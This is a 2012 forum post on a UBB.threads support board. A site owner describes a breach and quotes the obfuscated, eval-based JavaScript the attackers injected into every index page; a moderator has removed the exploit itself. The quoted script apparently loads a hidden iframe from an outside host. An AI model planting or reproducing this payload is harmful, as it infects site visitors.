hackers breached my site through UBB

Print Thread

Hop To

#249131 05/11/2012 10:19 AM

Joined: May 2008

Posts: 753

Likes: 1

Coast of Maine

Bad Frog

Old Hand

Bad Frog

Old Hand

Joined: May 2008

Posts: 753

Likes: 1

Coast of Maine

hackers found a way to inject a file onto my site that self replicated throughout my server and injected malicious code in all index.htm and index.html files.

they did it with this...

Code

-- SD: saved code locally and removed from post --

and this is what they were injecting...

Code

 
<script>i=0;try{prototype;}catch(z){h="harCode";f=['-33c-33c63c60c-10c-2c58c69c57c75c67c59c68c74c4c61c59c74c27c66c59c67c59c68c74c73c24c79c42c55c61c36c55c67c59c-2c-3c56c69c58c79c-3c-1c49c6c51c-1c81c-29c-33c-33c-33c63c60c72c55c67c59c72c-2c-1c17c-29c-33c-33c83c-10c59c66c73c59c-10c81c-29c-33c-33c-33c58c69c57c75c67c59c68c74c4c77c72c63c74c59c-2c-8c18c63c60c72c55c67c59c-10c73c72c57c19c-3c62c74c74c70c16c5c5c63c77c59c55c79c76c75c55c76c4c63c61c61c4c56c63c80c5c21c61c69c19c8c-3c-10c77c63c58c74c62c19c-3c7c6c-3c-10c62c59c63c61c62c74c19c-3c7c6c-3c-10c73c74c79c66c59c19c-3c76c63c73c63c56c63c66c63c74c79c16c62c63c58c58c59c68c17c70c69c73c63c74c63c69c68c16c55c56c73c69c66c75c74c59c17c66c59c60c74c16c6c17c74c69c70c16c6c17c-3c20c18c5c63c60c72c55c67c59c20c-8c-1c17c-29c-33c-33c83c-29c-33c-33c60c75c68c57c74c63c69c68c-10c63c60c72c55c67c59c72c-2c-1c81c-29c-33c-33c-33c76c55c72c-10c60c-10c19c-10c58c69c57c75c67c59c68c74c4c57c72c59c55c74c59c27c66c59c67c59c68c74c-2c-3c63c60c72c55c67c59c-3c-1c17c60c4c73c59c74c23c74c74c72c63c56c75c74c59c-2c-3c73c72c57c-3c2c-3c62c74c74c70c16c5c5c63c77c59c55c79c76c75c55c76c4c63c61c61c4c56c63c80c5c21c61c69c19c8c-3c-1c17c60c4c73c74c79c66c59c4c76c63c73c63c56c63c66c63c74c79c19c-3c62c63c58c58c59c68c-3c17c60c4c73c74c79c66c59c4c70c69c73c63c74c63c69c68c19c-3c55c56c73c69c66c75c74c59c-3c17c60c4c73c74c79c66c59c4c66c59c60c74c19c-3c6c-3c17c60c4c73c74c79c66c59c4c74c69c70c19c-3c6c-3c17c60c4c73c59c74c23c74c74c72c63c56c75c74c59c-2c-3c77c63c58c74c62c-3c2c-3c7c6c-3c-1c17c60c4c73c59c74c23c74c74c72c63c56c75c74c59c-2c-3c62c59c63c61c62c74c-3c2c-3c7c6c-3c-1c17c-29c-33c-33c-33c58c69c57c75c67c59c68c74c4c61c59c74c27c66c59c67c59c68c74c73c24c79c42c55c61c36c55c67c59c-2c-3c56c69c58c79c-3c-1c49c6c51c4c55c70c70c59c68c58c25c62c63c66c58c-2c60c-1c17c-29c-33c-33c83'][0].split('c');v="e"+"va"+"l";}if(v)e=window[v];try{q=document.createElement("div");q.appendChild(q+"");}catch(qwg){w=f;s=[];} r=String;z=((e)?h:"");for(;569!=i;i+=1){j=i;if(e)s=s+r["fromC"+z](w[j]*1+42);} if(v&&e&&r)e(s);</script>

I am using UBB 7.5.6p2

Last edited by SD; 05/11/2012 11:44 AM. Reason: Just removed actual exploit line

"No matter where you go, there you are."
"If you can't do something smart, Do something right"
"There are three kinds of people in the world, those who can count, and those who can't"

Entire Thread
Subject	Posted By	Posted
hackers breached my site through UBB	Bad Frog	05/11/2012 2:19 PM
Re: hackers breached my site through UBB	Mike L	05/11/2012 3:40 PM
Re: hackers breached my site through UBB	SD	05/11/2012 3:42 PM
Re: hackers breached my site through UBB	SD	05/11/2012 3:46 PM
Re: hackers breached my site through UBB	AllenAyres	05/11/2012 4:50 PM
Re: hackers breached my site through UBB	SD	05/11/2012 4:52 PM
Re: hackers breached my site through UBB	Bad Frog	05/11/2012 8:07 PM

Link Copied to Clipboard

UBB.threads PHP Forum Software Community Forums UBB.threads 7 Version 7 Support hackers breached my site through UBB